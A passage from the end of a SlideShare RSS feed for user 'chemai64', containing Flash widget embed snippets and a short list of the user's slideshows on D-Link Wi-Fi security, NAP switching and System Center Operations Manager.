        <slideshare:thumbnail>http://cdn.slidesharecdn.com/cspp-090917181402-phpapp02-thumbnail-2?1253229285</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <slideshare:multiwidget>
      <![CDATA[<div style="width:577px;margin:auto;"><object style="margin:0px" width="575" height="410"><param name="movie" value="http://static.slidesharecdn.com/swf/multiwidget.swf"/><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/multiwidget.swf" flashVars="feedurl=user/chemai64&widgettitle=Slideshows by User: chemai64" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="575" height="410"></embed></object><br/><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;text-align:left;"><a href="http://www.slideshare.net/?src=multiwidget"><img src="http://static.slidesharecdn.com/swf/logo_embd.png" style="border:0px none;margin-bottom:-5px" alt="SlideShare"/></a> | <a href="http://www.slideshare.net/widgets/playlist" title="Get your SlideShare Playlist">Get your SlideShare Playlist</a></div></div>]]>
    </slideshare:multiwidget>
    <slideshare:multiwidgetPT>
      <![CDATA[<div style="width:422px;margin:auto;"><object style="margin:0px" width="420" height="593"><param name="movie" value="http://static.slidesharecdn.com/swf/multiwidgetPT.swf"/><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/multiwidgetPT.swf" flashVars="feedurl=user/chemai64&widgettitle=Slideshows by User: chemai64" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="593"></embed></object><br/><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;text-align:left;"><a href="http://www.slideshare.net/?src=multiwidget"><img src="http://static.slidesharecdn.com/swf/logo_embd.png" style="border:0px none;margin-bottom:-5px" alt="SlideShare"/></a> | <a href="http://www.slideshare.net/widgets/playlist" title="Get your SlideShare Playlist">Get your SlideShare Playlist</a></div></div>]]>
    </slideshare:multiwidgetPT>
    <slideshare:egowidget>
      <![CDATA[<div style="width:540px;margin:auto;"><object style="margin:0px" width="538" height="341"><param name="movie" value="http://static.slidesharecdn.com/swf/egowidget2.swf"/><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/egowidget2.swf" flashVars="feedurl=user/chemai64&widgettitle=Slideshows by User: chemai64" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="538" height="341"></embed></object><br/><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;text-align:left;"><a href="http://www.slideshare.net/?src=egowidget"><img src="http://static.slidesharecdn.com/swf/logo_embd.png" style="border:0px none;margin-bottom:-5px" alt="SlideShare"/></a> | <a href="http://www.slideshare.net/widgets/presentation-pack" title="Get your Presentation Pack">Get your Presentation Pack</a></div></div>]]>
    </slideshare:egowidget>
    <slideshare:egowidgetPT>
      <![CDATA[<div style="width:357px;margin:auto;"><object style="margin:0px" width="355" height="542"><param name="movie" value="http://static.slidesharecdn.com/swf/egowidget2PT.swf"/><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/egowidget2PT.swf" flashVars="feedurl=user/chemai64&widgettitle=Slideshows by User: chemai64" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="355" height="542"></embed></object><br/><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;text-align:left;"><a href="http://www.slideshare.net/?src=egowidget"><img src="http://static.slidesharecdn.com/swf/logo_embd.png" style="border:0px none;margin-bottom:-5px" alt="SlideShare"/></a> | <a href="http://www.slideshare.net/widgets/presentation-pack" title="Get your Presentation Pack">Get your Presentation Pack</a></div></div>]]>
    </slideshare:egowidgetPT>
    <slideshare:sidebarwidget_black>
      <![CDATA[<div style='width:180;margin:auto'><object type='application/x-shockwave-flash' data='http://static.slidesharecdn.com/swf/blogbarwidget_black.swf?sidebarfeed=user/chemai64' width='180' height='725'><param name='movie' value='http://static.slidesharecdn.com/swf/blogbarwidget_black.swf?sidebarfeed=user/chemai64' /><param name='allowScriptAccess' value='always'/><embed type='application/x-shockwave-flash' src='http://static.slidesharecdn.com/swf/blogbarwidget_black.swf?sidebarfeed=user/chemai64' allowscriptaccess='always' width='180' height='725'></embed></object><div style='font-size:11px;font-family:tahoma,arial;height:26px;width:180px;padding-top:2px;text-align:center;'><a href='http://www.slideshare.net/widgets/blogbadge' title='Get your Sidebar Widget' style='border:0px none;margin-bottom:-5px' >Get your own Widget</a></div></div>]]>
    </slideshare:sidebarwidget_black>
    <userInfo>
      <thumbnailImg>http://public.slidesharecdn.com/images/userImage_SMALL.gif</thumbnailImg>
      <userDesc></userDesc>
      <userUrl></userUrl>
      <userSlideshows>
        <userSlideShow>
          <userSlideshowThumb>http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail?1260606733</userSlideshowThumb>
          <userSlideshowUrl>chemai64/wifi-segura-con-dlink-windows-server-2008-r2</userSlideshowUrl>
          <userSlideshowTitle>Wifi Segura con D-Link...</userSlideshowTitle>
        </userSlideShow>
        <userSlideShow>
          <userSlideshowThumb>http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail?1260606629</userSlideshowThumb>
          <userSlideshowUrl>chemai64/switching-d-link-nap-windows-server-2008-r2</userSlideshowUrl>
          <userSlideshowTitle>Switching D Link &amp; NAP...</userSlideshowTitle>
        </userSlideShow>
        <userSlideShow>
          <userSlideshowThumb>http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail?1260606543</userSlideshowThumb>
          <userSlideshowUrl>chemai64/system-center-operation-manager-2007-r2-scom</userSlideshowUrl>
          <userSlideshowTitle>System Center Operatio...</userSlideshowTitle>
        </userSlideShow>
      </userSlideshows>
    </userInfo>
  </channel>
</rss>
